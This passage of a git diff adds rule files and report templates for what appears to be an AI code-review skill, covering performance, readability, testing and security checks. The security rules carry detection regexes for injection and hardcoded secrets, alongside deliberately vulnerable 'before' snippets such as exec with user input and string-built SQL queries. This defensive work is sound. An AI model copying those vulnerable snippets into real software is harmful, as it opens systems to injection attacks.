||||
"patternType": "ast"
|
||||
}
|
||||
```
|
||||
|
||||
## Usage in Code
|
||||
|
||||
```javascript
|
||||
// Load rules
|
||||
const rules = JSON.parse(fs.readFileSync('correctness-rules.json'));
|
||||
|
||||
// Apply rules
|
||||
for (const rule of rules.rules) {
|
||||
const matches = detectByPattern(content, rule.pattern, rule.patternType);
|
||||
for (const match of matches) {
|
||||
// Check negative patterns
|
||||
if (rule.negativePatterns?.some(np => match.context.includes(np))) {
|
||||
continue;
|
||||
}
|
||||
findings.push({
|
||||
id: `${rules.prefix}-${counter++}`,
|
||||
severity: rule.severity,
|
||||
category: rule.category,
|
||||
description: rule.description,
|
||||
recommendation: rule.recommendation,
|
||||
fixExample: rule.fixExample
|
||||
});
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Adding New Rules
|
||||
|
||||
1. Identify the appropriate dimension
|
||||
2. Create rule with unique `id` within dimension
|
||||
3. Choose appropriate `patternType`
|
||||
4. Provide clear `description` and `recommendation`
|
||||
5. Include practical `fixExample`
|
||||
6. Test against sample code
|
||||
|
||||
## Rule Maintenance
|
||||
|
||||
- Review rules quarterly for relevance
|
||||
- Update patterns as language/framework evolves
|
||||
- Track false positive rates
|
||||
- Collect feedback from users
|
||||
@@ -0,0 +1,59 @@
|
||||
{
|
||||
"dimension": "performance",
|
||||
"prefix": "PERF",
|
||||
"description": "Rules for detecting performance issues including inefficient algorithms, memory leaks, and resource waste",
|
||||
"rules": [
|
||||
{
|
||||
"id": "nested-loops",
|
||||
"category": "algorithm-complexity",
|
||||
"severity": "medium",
|
||||
"pattern": "for\\s*\\([^)]+\\)\\s*\\{[^}]*for\\s*\\([^)]+\\)|forEach\\s*\\([^)]+\\)\\s*\\{[^}]*forEach",
|
||||
"patternType": "regex",
|
||||
"description": "Nested loops may indicate O(n^2) or worse complexity. Consider if this can be optimized",
|
||||
"recommendation": "Use Map/Set for O(1) lookups, break early when possible, or restructure the algorithm",
|
||||
"fixExample": "// Before - O(n^2)\nfor (const a of listA) {\n for (const b of listB) {\n if (a.id === b.id) { ... }\n }\n}\n\n// After - O(n)\nconst bMap = new Map(listB.map(b => [b.id, b]));\nfor (const a of listA) {\n const b = bMap.get(a.id);\n if (b) { ... }\n}"
|
||||
},
|
||||
{
|
||||
"id": "array-in-loop",
|
||||
"category": "inefficient-operation",
|
||||
"severity": "high",
|
||||
"pattern": "\\.includes\\s*\\(|indexOf\\s*\\(|find\\s*\\(",
|
||||
"patternType": "includes",
|
||||
"contextPattern": "for|while|forEach|map|filter|reduce",
|
||||
"description": "Array search methods inside loops cause O(n*m) complexity. Consider using Set or Map",
|
||||
"recommendation": "Convert array to Set before the loop for O(1) lookups",
|
||||
"fixExample": "// Before - O(n*m)\nfor (const item of items) {\n if (existingIds.includes(item.id)) { ... }\n}\n\n// After - O(n)\nconst idSet = new Set(existingIds);\nfor (const item of items) {\n if (idSet.has(item.id)) { ... }\n}"
|
||||
},
|
||||
{
|
||||
"id": "synchronous-io",
|
||||
"category": "io-efficiency",
|
||||
"severity": "high",
|
||||
"pattern": "readFileSync|writeFileSync|execSync|spawnSync",
|
||||
"patternType": "includes",
|
||||
"description": "Synchronous I/O blocks the event loop and degrades application responsiveness",
|
||||
"recommendation": "Use async versions (readFile, writeFile) or Promise-based APIs",
|
||||
"fixExample": "// Before\nconst data = fs.readFileSync(path);\n\n// After\nconst data = await fs.promises.readFile(path);\n// or\nfs.readFile(path, (err, data) => { ... });"
|
||||
},
|
||||
{
|
||||
"id": "memory-leak-closure",
|
||||
"category": "memory-leak",
|
||||
"severity": "high",
|
||||
"pattern": "addEventListener\\s*\\(|setInterval\\s*\\(|setTimeout\\s*\\(",
|
||||
"patternType": "regex",
|
||||
"negativePatterns": ["removeEventListener", "clearInterval", "clearTimeout"],
|
||||
"description": "Event listeners and timers without cleanup can cause memory leaks",
|
||||
"recommendation": "Always remove event listeners and clear timers in cleanup functions (componentWillUnmount, useEffect cleanup)",
|
||||
"fixExample": "// Before\nuseEffect(() => {\n window.addEventListener('resize', handler);\n}, []);\n\n// After\nuseEffect(() => {\n window.addEventListener('resize', handler);\n return () => window.removeEventListener('resize', handler);\n}, []);"
|
||||
},
|
||||
{
|
||||
"id": "unnecessary-rerender",
|
||||
"category": "react-performance",
|
||||
"severity": "medium",
|
||||
"pattern": "useState\\s*\\(\\s*\\{|useState\\s*\\(\\s*\\[",
|
||||
"patternType": "regex",
|
||||
"description": "Creating new object/array references in useState can cause unnecessary re-renders",
|
||||
"recommendation": "Use useMemo for computed values, useCallback for functions, or consider state management libraries",
|
||||
"fixExample": "// Before - new object every render\nconst [config] = useState({ theme: 'dark' });\n\n// After - stable reference\nconst defaultConfig = useMemo(() => ({ theme: 'dark' }), []);\nconst [config] = useState(defaultConfig);"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -0,0 +1,60 @@
|
||||
{
|
||||
"dimension": "readability",
|
||||
"prefix": "READ",
|
||||
"description": "Rules for detecting code readability issues including naming, complexity, and documentation",
|
||||
"rules": [
|
||||
{
|
||||
"id": "long-function",
|
||||
"category": "function-length",
|
||||
"severity": "medium",
|
||||
"pattern": "function\\s+\\w+\\s*\\([^)]*\\)\\s*\\{|=>\\s*\\{",
|
||||
"patternType": "regex",
|
||||
"lineThreshold": 50,
|
||||
"description": "Functions longer than 50 lines are difficult to understand and maintain",
|
||||
"recommendation": "Break down into smaller, focused functions. Each function should do one thing well",
|
||||
"fixExample": "// Before - 100 line function\nfunction processData(data) {\n // validation\n // transformation\n // calculation\n // formatting\n // output\n}\n\n// After - composed functions\nfunction processData(data) {\n const validated = validateData(data);\n const transformed = transformData(validated);\n return formatOutput(calculateResults(transformed));\n}"
|
||||
},
|
||||
{
|
||||
"id": "single-letter-variable",
|
||||
"category": "naming",
|
||||
"severity": "low",
|
||||
"pattern": "(?:const|let|var)\\s+[a-z]\\s*=",
|
||||
"patternType": "regex",
|
||||
"negativePatterns": ["for\\s*\\(", "\\[\\w,\\s*\\w\\]", "catch\\s*\\(e\\)"],
|
||||
"description": "Single letter variable names reduce code readability except in specific contexts (loop counters, catch)",
|
||||
"recommendation": "Use descriptive names that convey the variable's purpose",
|
||||
"fixExample": "// Before\nconst d = getData();\nconst r = d.map(x => x.value);\n\n// After\nconst userData = getData();\nconst userValues = userData.map(user => user.value);"
|
||||
},
|
||||
{
|
||||
"id": "deep-nesting",
|
||||
"category": "complexity",
|
||||
"severity": "high",
|
||||
"pattern": "\\{[^}]*\\{[^}]*\\{[^}]*\\{",
|
||||
"patternType": "regex",
|
||||
"description": "Deeply nested code (4+ levels) is hard to follow and maintain",
|
||||
"recommendation": "Use early returns, extract functions, or flatten conditionals",
|
||||
"fixExample": "// Before\nif (user) {\n if (user.permissions) {\n if (user.permissions.canEdit) {\n if (document.isEditable) {\n // do work\n }\n }\n }\n}\n\n// After\nif (!user?.permissions?.canEdit) return;\nif (!document.isEditable) return;\n// do work"
|
||||
},
|
||||
{
|
||||
"id": "magic-number",
|
||||
"category": "magic-value",
|
||||
"severity": "low",
|
||||
"pattern": "[^\\d]\\d{2,}[^\\d]|setTimeout\\s*\\([^,]+,\\s*\\d{4,}\\)",
|
||||
"patternType": "regex",
|
||||
"negativePatterns": ["const", "let", "enum", "0x", "100", "1000"],
|
||||
"description": "Magic numbers without explanation make code hard to understand",
|
||||
"recommendation": "Extract magic numbers into named constants with descriptive names",
|
||||
"fixExample": "// Before\nif (status === 403) { ... }\nsetTimeout(callback, 86400000);\n\n// After\nconst HTTP_FORBIDDEN = 403;\nconst ONE_DAY_MS = 24 * 60 * 60 * 1000;\nif (status === HTTP_FORBIDDEN) { ... }\nsetTimeout(callback, ONE_DAY_MS);"
|
||||
},
|
||||
{
|
||||
"id": "commented-code",
|
||||
"category": "dead-code",
|
||||
"severity": "low",
|
||||
"pattern": "//\\s*(const|let|var|function|if|for|while|return)\\s+",
|
||||
"patternType": "regex",
|
||||
"description": "Commented-out code adds noise and should be removed. Use version control for history",
|
||||
"recommendation": "Remove commented code. If needed for reference, add a comment explaining why with a link to relevant commit/issue",
|
||||
"fixExample": "// Before\n// function oldImplementation() { ... }\n// const legacyConfig = {...};\n\n// After\n// See PR #123 for previous implementation\n// removed 2024-01-01"
|
||||
}
|
||||
]
|
||||
}
|
||||
58
.claude/skills/review-code/specs/rules/security-rules.json
Normal file
@@ -0,0 +1,58 @@
|
||||
{
|
||||
"dimension": "security",
|
||||
"prefix": "SEC",
|
||||
"description": "Rules for detecting security vulnerabilities including XSS, injection, and credential exposure",
|
||||
"rules": [
|
||||
{
|
||||
"id": "xss-innerHTML",
|
||||
"category": "xss-risk",
|
||||
"severity": "critical",
|
||||
"pattern": "innerHTML\\s*=|dangerouslySetInnerHTML",
|
||||
"patternType": "includes",
|
||||
"description": "Direct HTML injection via innerHTML or dangerouslySetInnerHTML can lead to XSS vulnerabilities",
|
||||
"recommendation": "Use textContent for plain text, or sanitize HTML input using a library like DOMPurify before injection",
|
||||
"fixExample": "// Before\nelement.innerHTML = userInput;\n<div dangerouslySetInnerHTML={{__html: data}} />\n\n// After\nelement.textContent = userInput;\n// or\nimport DOMPurify from 'dompurify';\nelement.innerHTML = DOMPurify.sanitize(userInput);"
|
||||
},
|
||||
{
|
||||
"id": "hardcoded-secret",
|
||||
"category": "hardcoded-secret",
|
||||
"severity": "critical",
|
||||
"pattern": "(?:password|secret|api[_-]?key|token|credential)\\s*[=:]\\s*['\"][^'\"]{8,}['\"]",
|
||||
"patternType": "regex",
|
||||
"caseInsensitive": true,
|
||||
"description": "Hardcoded credentials detected in source code. This is a security risk if code is exposed",
|
||||
"recommendation": "Use environment variables, secret management services, or configuration files excluded from version control",
|
||||
"fixExample": "// Before\nconst apiKey = 'sk-1234567890abcdef';\n\n// After\nconst apiKey = process.env.API_KEY;\n// or\nconst apiKey = await getSecretFromVault('api-key');"
|
||||
},
|
||||
{
|
||||
"id": "sql-injection",
|
||||
"category": "injection",
|
||||
"severity": "critical",
|
||||
"pattern": "query\\s*\\(\\s*[`'\"].*\\$\\{|execute\\s*\\(\\s*[`'\"].*\\+",
|
||||
"patternType": "regex",
|
||||
"description": "String concatenation or template literals in SQL queries can lead to SQL injection",
|
||||
"recommendation": "Use parameterized queries or prepared statements with placeholders",
|
||||
"fixExample": "// Before\ndb.query(`SELECT * FROM users WHERE id = ${userId}`);\n\n// After\ndb.query('SELECT * FROM users WHERE id = ?', [userId]);\n// or\ndb.query('SELECT * FROM users WHERE id = $1', [userId]);"
|
||||
},
|
||||
{
|
||||
"id": "command-injection",
|
||||
"category": "injection",
|
||||
"severity": "critical",
|
||||
"pattern": "exec\\s*\\(|execSync\\s*\\(|spawn\\s*\\([^,]*\\+|child_process",
|
||||
"patternType": "regex",
|
||||
"description": "Command execution with user input can lead to command injection attacks",
|
||||
"recommendation": "Validate and sanitize input, use parameterized commands, or avoid shell execution entirely",
|
||||
"fixExample": "// Before\nexec(`ls ${userInput}`);\n\n// After\nexecFile('ls', [sanitizedInput], options);\n// or use spawn with {shell: false}"
|
||||
},
|
||||
{
|
||||
"id": "insecure-random",
|
||||
"category": "cryptography",
|
||||
"severity": "high",
|
||||
"pattern": "Math\\.random\\(\\)",
|
||||
"patternType": "includes",
|
||||
"description": "Math.random() is not cryptographically secure and should not be used for security-sensitive operations",
|
||||
"recommendation": "Use crypto.randomBytes() or crypto.getRandomValues() for security-critical random generation",
|
||||
"fixExample": "// Before\nconst token = Math.random().toString(36);\n\n// After\nimport crypto from 'crypto';\nconst token = crypto.randomBytes(32).toString('hex');"
|
||||
}
|
||||
]
|
||||
}
|
||||
59
.claude/skills/review-code/specs/rules/testing-rules.json
Normal file
@@ -0,0 +1,59 @@
|
||||
{
|
||||
"dimension": "testing",
|
||||
"prefix": "TEST",
|
||||
"description": "Rules for detecting testing issues including coverage gaps, test quality, and mock usage",
|
||||
"rules": [
|
||||
{
|
||||
"id": "missing-assertion",
|
||||
"category": "test-quality",
|
||||
"severity": "high",
|
||||
"pattern": "(?:it|test)\\s*\\([^)]+,\\s*(?:async\\s*)?\\(\\)\\s*=>\\s*\\{[^}]*\\}\\s*\\)",
|
||||
"patternType": "regex",
|
||||
"negativePatterns": ["expect", "assert", "should", "toBe", "toEqual"],
|
||||
"description": "Test case without assertions always passes and provides no value",
|
||||
"recommendation": "Add assertions to verify expected behavior. Each test should have at least one meaningful assertion",
|
||||
"fixExample": "// Before\nit('should process data', async () => {\n await processData(input);\n});\n\n// After\nit('should process data', async () => {\n const result = await processData(input);\n expect(result.success).toBe(true);\n expect(result.data).toHaveLength(3);\n});"
|
||||
},
|
||||
{
|
||||
"id": "hardcoded-test-data",
|
||||
"category": "test-maintainability",
|
||||
"severity": "low",
|
||||
"pattern": "expect\\s*\\([^)]+\\)\\.toBe\\s*\\(['\"][^'\"]{20,}['\"]\\)",
|
||||
"patternType": "regex",
|
||||
"description": "Long hardcoded strings in assertions are brittle and hard to maintain",
|
||||
"recommendation": "Use snapshots for large outputs, or extract expected values to test fixtures",
|
||||
"fixExample": "// Before\nexpect(result).toBe('very long expected string that is hard to maintain...');\n\n// After\nexpect(result).toMatchSnapshot();\n// or\nconst expected = loadFixture('expected-output.json');\nexpect(result).toEqual(expected);"
|
||||
},
|
||||
{
|
||||
"id": "no-error-test",
|
||||
"category": "coverage-gap",
|
||||
"severity": "medium",
|
||||
"pattern": "describe\\s*\\([^)]+",
|
||||
"patternType": "regex",
|
||||
"negativePatterns": ["throw", "reject", "error", "fail", "catch"],
|
||||
"description": "Test suite may be missing error path testing. Error handling is critical for reliability",
|
||||
"recommendation": "Add tests for error cases: invalid input, network failures, edge cases",
|
||||
"fixExample": "// Add error path tests\nit('should throw on invalid input', () => {\n expect(() => processData(null)).toThrow('Invalid input');\n});\n\nit('should handle network failure', async () => {\n mockApi.mockRejectedValue(new Error('Network error'));\n await expect(fetchData()).rejects.toThrow('Network error');\n});"
|
||||
},
|
||||
{
|
||||
"id": "test-implementation-detail",
|
||||
"category": "test-quality",
|
||||
"severity": "medium",
|
||||
"pattern": "toHaveBeenCalledWith|toHaveBeenCalledTimes",
|
||||
"patternType": "includes",
|
||||
"description": "Testing implementation details (call counts, exact parameters) makes tests brittle to refactoring",
|
||||
"recommendation": "Prefer testing observable behavior and outcomes over internal implementation",
|
||||
"fixExample": "// Before - brittle\nexpect(mockService.process).toHaveBeenCalledTimes(3);\nexpect(mockService.process).toHaveBeenCalledWith('exact-arg');\n\n// After - behavior-focused\nexpect(result.items).toHaveLength(3);\nexpect(result.processed).toBe(true);"
|
||||
},
|
||||
{
|
||||
"id": "skip-test",
|
||||
"category": "test-coverage",
|
||||
"severity": "high",
|
||||
"pattern": "it\\.skip|test\\.skip|xit|xdescribe|describe\\.skip",
|
||||
"patternType": "regex",
|
||||
"description": "Skipped tests indicate untested code paths or broken functionality",
|
||||
"recommendation": "Fix or remove skipped tests. If temporarily skipped, add TODO comment with issue reference",
|
||||
"fixExample": "// Before\nit.skip('should handle edge case', () => { ... });\n\n// After - either fix it\nit('should handle edge case', () => {\n // fixed implementation\n});\n\n// Or document why skipped\n// TODO(#123): Re-enable after API migration\nit.skip('should handle edge case', () => { ... });"
|
||||
}
|
||||
]
|
||||
}
|
||||
186
.claude/skills/review-code/templates/issue-template.md
Normal file
@@ -0,0 +1,186 @@
|
||||
# Issue Template
|
||||
|
||||
问题记录模板。
|
||||
|
||||
## Single Issue Template
|
||||
|
||||
```markdown
|
||||
#### {{severity_emoji}} [{{id}}] {{category}}
|
||||
|
||||
- **严重程度**: {{severity}}
|
||||
- **维度**: {{dimension}}
|
||||
- **文件**: `{{file}}`{{#if line}}:{{line}}{{/if}}
|
||||
- **描述**: {{description}}
|
||||
|
||||
{{#if code_snippet}}
|
||||
**问题代码**:
|
||||
```{{language}}
|
||||
{{code_snippet}}
|
||||
```
|
||||
{{/if}}
|
||||
|
||||
**建议**: {{recommendation}}
|
||||
|
||||
{{#if fix_example}}
|
||||
**修复示例**:
|
||||
```{{language}}
|
||||
{{fix_example}}
|
||||
```
|
||||
{{/if}}
|
||||
|
||||
{{#if references}}
|
||||
**参考资料**:
|
||||
{{#each references}}
|
||||
- {{this}}
|
||||
{{/each}}
|
||||
{{/if}}
|
||||
```
|
||||
|
||||
## Issue Object Schema
|
||||
|
||||
```typescript
|
||||
interface Issue {
|
||||
id: string; // e.g., "SEC-001"
|
||||
severity: 'critical' | 'high' | 'medium' | 'low' | 'info';
|
||||
dimension: string; // e.g., "security"
|
||||
category: string; // e.g., "xss-risk"
|
||||
file: string; // e.g., "src/utils/render.ts"
|
||||
line?: number; // e.g., 42
|
||||
column?: number; // e.g., 15
|
||||
code_snippet?: string;
|
||||
description: string;
|
||||
recommendation: string;
|
||||
fix_example?: string;
|
||||
references?: string[];
|
||||
}
|
||||
```
|
||||
|
||||
## ID Generation
|
||||
|
||||
```javascript
|
||||
function generateIssueId(dimension, counter) {
|
||||
const prefixes = {
|
||||
correctness: 'CORR',
|
||||
readability: 'READ',
|
||||
performance: 'PERF',
|
||||
security: 'SEC',
|
||||
testing: 'TEST',
|
||||
architecture: 'ARCH'
|
||||
};
|
||||
|
||||
const prefix = prefixes[dimension] || 'MISC';
|
||||
const number = String(counter).padStart(3, '0');
|
||||
|
||||
return `${prefix}-${number}`;
|
||||
}
|
||||
```
|
||||
|
||||
## Severity Emojis
|
||||
|
||||
```javascript
|
||||
const SEVERITY_EMOJI = {
|
||||
critical: '🔴',
|
||||
high: '🟠',
|
||||
medium: '🟡',
|
||||
low: '🔵',
|
||||
info: '⚪'
|
||||
};
|
||||
```
|
||||
|
||||
## Issue Categories by Dimension
|
||||
|
||||
### Correctness
|
||||
- `null-check` - 缺少空值检查
|
||||
- `boundary` - 边界条件未处理
|
||||
- `error-handling` - 错误处理不当
|
||||
- `type-safety` - 类型安全问题
|
||||
- `logic-error` - 逻辑错误
|
||||
- `resource-leak` - 资源泄漏
|
||||
|
||||
### Security
|
||||
- `injection` - 注入风险
|
||||
- `xss` - 跨站脚本
|
||||
- `hardcoded-secret` - 硬编码密钥
|
||||
- `auth` - 认证授权
|
||||
- `sensitive-data` - 敏感数据
|
||||
|
||||
### Performance
|
||||
- `complexity` - 复杂度问题
|
||||
- `n+1-query` - N+1 查询
|
||||
- `memory-leak` - 内存泄漏
|
||||
- `blocking-io` - 阻塞 I/O
|
||||
- `inefficient-algorithm` - 低效算法
|
||||
|
||||
### Readability
|
||||
- `naming` - 命名问题
|
||||
- `function-length` - 函数过长
|
||||
- `nesting-depth` - 嵌套过深
|
||||
- `comments` - 注释问题
|
||||
- `duplication` - 代码重复
|
||||
|
||||
### Testing
|
||||
- `coverage` - 覆盖不足
|
||||
- `boundary-test` - 缺少边界测试
|
||||
- `test-isolation` - 测试不独立
|
||||
- `flaky-test` - 不稳定测试
|
||||
|
||||
### Architecture
|
||||
- `layer-violation` - 层次违规
|
||||
- `circular-dependency` - 循环依赖
|
||||
- `coupling` - 耦合过紧
|
||||
- `srp-violation` - 单一职责违规
|
||||
|
||||
## Example Issues
|
||||
|
||||
### Critical Security Issue
|
||||
|
||||
```json
|
||||
{
|
||||
"id": "SEC-001",
|
||||
"severity": "critical",
|
||||
"dimension": "security",
|
||||
"category": "xss",
|
||||
"file": "src/components/Comment.tsx",
|
||||
"line": 25,
|
||||
"code_snippet": "element.innerHTML = userComment;",
|
||||
"description": "直接使用 innerHTML 插入用户输入,存在 XSS 攻击风险",
|
||||
"recommendation": "使用 textContent 或对用户输入进行 HTML 转义",
|
||||
"fix_example": "element.textContent = userComment;\n// 或\nelement.innerHTML = DOMPurify.sanitize(userComment);",
|
||||
"references": [
|
||||
"https://owasp.org/www-community/xss-filter-evasion-cheatsheet"
|
||||
]
|
||||
}
|
||||
```
|
||||
|
||||
### High Correctness Issue
|
||||
|
||||
```json
|
||||
{
|
||||
"id": "CORR-003",
|
||||
"severity": "high",
|
||||
"dimension": "correctness",
|
||||
"category": "error-handling",
|
||||
"file": "src/services/api.ts",
|
||||
"line": 42,
|
||||
"code_snippet": "try {\n await fetchData();\n} catch (e) {}",
|
||||
"description": "空的 catch 块会静默吞掉错误,导致问题难以发现和调试",
|
||||
"recommendation": "记录错误日志或重新抛出异常",
|
||||
"fix_example": "try {\n await fetchData();\n} catch (e) {\n console.error('Failed to fetch data:', e);\n throw e;\n}"
|
||||
}
|
||||
```
|
||||
|
||||
### Medium Readability Issue
|
||||
|
||||
```json
|
||||
{
|
||||
"id": "READ-007",
|
||||
"severity": "medium",
|
||||
"dimension": "readability",
|
||||
"category": "function-length",
|
||||
"file": "src/utils/processor.ts",
|
||||
"line": 15,
|
||||
"description": "函数 processData 有 150 行,超过推荐的 50 行限制,难以理解和维护",
|
||||
"recommendation": "将函数拆分为多个小函数,每个函数负责单一职责",
|
||||
"fix_example": "// 拆分为:\nfunction validateInput(data) { ... }\nfunction transformData(data) { ... }\nfunction saveData(data) { ... }"
|
||||
}
|
||||
```
|
||||
173
.claude/skills/review-code/templates/review-report.md
Normal file
@@ -0,0 +1,173 @@
|
||||
# Review Report Template
|
||||
|
||||
审查报告模板。
|
||||
|
||||
## Template Structure
|
||||
|
||||
```markdown
|
||||
# Code Review Report
|
||||
|
||||
## 审查概览
|
||||
|
||||
| 项目 | 值 |
|
||||
|------|------|
|
||||
| 目标路径 | `{{target_path}}` |
|
||||
| 文件数量 | {{file_count}} |
|
||||
| 代码行数 | {{total_lines}} |
|
||||
| 主要语言 | {{language}} |
|
||||
| 框架 | {{framework}} |
|
||||
| 审查时间 | {{review_duration}} |
|
||||
|
||||
## 问题统计
|
||||
|
||||
| 严重程度 | 数量 |
|
||||
|----------|------|
|
||||
| 🔴 Critical | {{critical_count}} |
|
||||
| 🟠 High | {{high_count}} |
|
||||
| 🟡 Medium | {{medium_count}} |
|
||||
| 🔵 Low | {{low_count}} |
|
||||
| ⚪ Info | {{info_count}} |
|
||||
| **总计** | **{{total_issues}}** |
|
||||
|
||||
### 按维度统计
|
||||
|
||||
| 维度 | 问题数 |
|
||||
|------|--------|
|
||||
| Correctness (正确性) | {{correctness_count}} |
|
||||
| Security (安全性) | {{security_count}} |
|
||||
| Performance (性能) | {{performance_count}} |
|
||||
| Readability (可读性) | {{readability_count}} |
|
||||
| Testing (测试) | {{testing_count}} |
|
||||
| Architecture (架构) | {{architecture_count}} |
|
||||
|
||||
---
|
||||
|
||||
## 高风险区域
|
||||
|
||||
{{#if risk_areas}}
|
||||
| 文件 | 原因 | 优先级 |
|
||||
|------|------|--------|
|
||||
{{#each risk_areas}}
|
||||
| `{{this.file}}` | {{this.reason}} | {{this.priority}} |
|
||||
{{/each}}
|
||||
{{else}}
|
||||
未发现明显的高风险区域。
|
||||
{{/if}}
|
||||
|
||||
---
|
||||
|
||||
## 问题详情
|
||||
|
||||
{{#each dimensions}}
|
||||
### {{this.name}}
|
||||
|
||||
{{#each this.findings}}
|
||||
#### {{severity_emoji this.severity}} [{{this.id}}] {{this.category}}
|
||||
|
||||
- **严重程度**: {{this.severity}}
|
||||
- **文件**: `{{this.file}}`{{#if this.line}}:{{this.line}}{{/if}}
|
||||
- **描述**: {{this.description}}
|
||||
|
||||
{{#if this.code_snippet}}
|
||||
```
|
||||
{{this.code_snippet}}
|
||||
```
|
||||
{{/if}}
|
||||
|
||||
**建议**: {{this.recommendation}}
|
||||
|
||||
{{#if this.fix_example}}
|
||||
**修复示例**:
|
||||
```
|
||||
{{this.fix_example}}
|
||||
```
|
||||
{{/if}}
|
||||
|
||||
---
|
||||
|
||||
{{/each}}
|
||||
{{/each}}
|
||||
|
||||
## 审查建议
|
||||
|
||||
### 必须修复 (Must Fix)
|
||||
|
||||
{{must_fix_summary}}
|
||||
|
||||
### 建议改进 (Should Fix)
|
||||
|
||||
{{should_fix_summary}}
|
||||
|
||||
### 可选优化 (Nice to Have)
|
||||
|
||||
{{nice_to_have_summary}}
|
||||
|
||||
---
|
||||
|
||||
*报告生成时间: {{generated_at}}*
|
||||
```
|
||||
|
||||
## Variable Definitions
|
||||
|
||||
| Variable | Type | Source |
|
||||
|----------|------|--------|
|
||||
| `{{target_path}}` | string | state.context.target_path |
|
||||
| `{{file_count}}` | number | state.context.file_count |
|
||||
| `{{total_lines}}` | number | state.context.total_lines |
|
||||
| `{{language}}` | string | state.context.language |
|
||||
| `{{framework}}` | string | state.context.framework |
|
||||
| `{{review_duration}}` | string | Formatted duration |
|
||||
| `{{critical_count}}` | number | Count of critical findings |
|
||||
| `{{high_count}}` | number | Count of high findings |
|
||||
| `{{medium_count}}` | number | Count of medium findings |
|
||||
| `{{low_count}}` | number | Count of low findings |
|
||||
| `{{info_count}}` | number | Count of info findings |
|
||||
| `{{total_issues}}` | number | Total findings |
|
||||
| `{{risk_areas}}` | array | state.scan_summary.risk_areas |
|
||||
| `{{dimensions}}` | array | Grouped findings by dimension |
|
||||
| `{{generated_at}}` | string | ISO timestamp |
|
||||
|
||||
## Helper Functions
|
||||
|
||||
```javascript
|
||||
/**
 * Handlebars helper: map a finding severity level to its display emoji.
 *
 * @param {string} severity - one of 'critical' | 'high' | 'medium' | 'low' | 'info'
 * @returns {string} the emoji for the level; '⚪' for any unknown level
 */
function severity_emoji(severity) {
  const emojis = {
    critical: '🔴',
    high: '🟠',
    medium: '🟡',
    low: '🔵',
    info: '⚪'
  };
  // Object.hasOwn guards against inherited Object.prototype keys
  // (e.g. severity === 'constructor' would otherwise return a function,
  // which is truthy and would bypass a plain `|| '⚪'` fallback).
  return Object.hasOwn(emojis, severity) ? emojis[severity] : '⚪';
}
|
||||
|
||||
/**
 * Format a millisecond duration as a Chinese "X分Y秒" (minutes/seconds) string.
 *
 * @param {number} ms - duration in milliseconds
 * @returns {string} e.g. 90000 -> "1分30秒"
 */
function formatDuration(ms) {
  const totalSeconds = Math.floor(ms / 1000);
  const minutes = Math.floor(totalSeconds / 60);
  const seconds = totalSeconds - minutes * 60;
  return `${minutes}分${seconds}秒`;
}
|
||||
|
||||
/**
 * Summarize the findings that must be fixed before merge.
 * Findings with severity 'critical' or 'high' are considered blocking.
 *
 * @param {Array<{severity: string}>} findings - all review findings
 * @returns {string} one-sentence Chinese summary
 */
function generateMustFixSummary(findings) {
  let criticalCount = 0;
  let highCount = 0;

  for (const finding of findings) {
    if (finding.severity === 'critical') {
      criticalCount += 1;
    } else if (finding.severity === 'high') {
      highCount += 1;
    }
  }

  if (criticalCount + highCount === 0) {
    return '未发现必须立即修复的问题。';
  }

  return `发现 ${criticalCount} 个严重问题和 ${highCount} 个高优先级问题,建议在合并前修复。`;
}
|
||||
```
|
||||
|
||||
## Usage Example
|
||||
|
||||
```javascript
|
||||
const report = generateReport({
|
||||
context: state.context,
|
||||
summary: state.summary,
|
||||
findings: state.findings,
|
||||
scanSummary: state.scan_summary
|
||||
});
|
||||
|
||||
Write(`${workDir}/review-report.md`, report);
|
||||
```
|
||||
@@ -15,6 +15,9 @@ Meta-skill for creating new Claude Code skills with configurable execution modes
|
||||
│ Skill Generator Architecture │
|
||||
├─────────────────────────────────────────────────────────────────┤
|
||||
│ │
|
||||
│ ⚠️ Phase 0: Specification → 阅读并理解设计规范 (强制前置) │
|
||||
│ Study SKILL-DESIGN-SPEC.md + 模板 │
|
||||
│ ↓ │
|
||||
│ Phase 1: Requirements → skill-config.json │
|
||||
│ Discovery (name, type, mode, agents) │
|
||||
│ ↓ │
|
||||
@@ -82,10 +85,63 @@ Phase 01 → Phase 02 → Phase 03 → ... → Phase N
|
||||
3. **规范遵循**: 严格遵循 `_shared/SKILL-DESIGN-SPEC.md`
|
||||
4. **可扩展性**: 生成的 Skill 易于扩展和修改
|
||||
|
||||
---
|
||||
|
||||
## ⚠️ Mandatory Prerequisites (强制前置条件)
|
||||
|
||||
> **⛔ 禁止跳过**: 在执行任何生成操作之前,**必须**完整阅读以下文档。未阅读规范直接生成将导致输出不符合质量标准。
|
||||
|
||||
### 核心规范 (必读)
|
||||
|
||||
| Document | Purpose | Priority |
|
||||
|----------|---------|----------|
|
||||
| [../_shared/SKILL-DESIGN-SPEC.md](../_shared/SKILL-DESIGN-SPEC.md) | 通用设计规范 - 定义所有 Skill 的结构、命名、质量标准 | **P0 - 最高** |
|
||||
|
||||
### 模板文件 (生成前必读)
|
||||
|
||||
| Document | Purpose |
|
||||
|----------|---------|
|
||||
| [templates/skill-md.md](templates/skill-md.md) | SKILL.md 入口文件模板 |
|
||||
| [templates/sequential-phase.md](templates/sequential-phase.md) | Sequential Phase 模板 |
|
||||
| [templates/autonomous-orchestrator.md](templates/autonomous-orchestrator.md) | Autonomous 编排器模板 |
|
||||
| [templates/autonomous-action.md](templates/autonomous-action.md) | Autonomous Action 模板 |
|
||||
| [templates/code-analysis-action.md](templates/code-analysis-action.md) | 代码分析 Action 模板 |
|
||||
| [templates/llm-action.md](templates/llm-action.md) | LLM Action 模板 |
|
||||
| [templates/script-bash.md](templates/script-bash.md) | Bash 脚本模板 |
|
||||
| [templates/script-python.md](templates/script-python.md) | Python 脚本模板 |
|
||||
|
||||
### 规范文档 (按需阅读)
|
||||
|
||||
| Document | Purpose |
|
||||
|----------|---------|
|
||||
| [specs/execution-modes.md](specs/execution-modes.md) | 执行模式规范 |
|
||||
| [specs/skill-requirements.md](specs/skill-requirements.md) | Skill 需求规范 |
|
||||
| [specs/cli-integration.md](specs/cli-integration.md) | CLI 集成规范 |
|
||||
| [specs/scripting-integration.md](specs/scripting-integration.md) | 脚本集成规范 |
|
||||
|
||||
### Phase 执行指南 (执行时参考)
|
||||
|
||||
| Document | Purpose |
|
||||
|----------|---------|
|
||||
| [phases/01-requirements-discovery.md](phases/01-requirements-discovery.md) | 收集 Skill 需求 |
|
||||
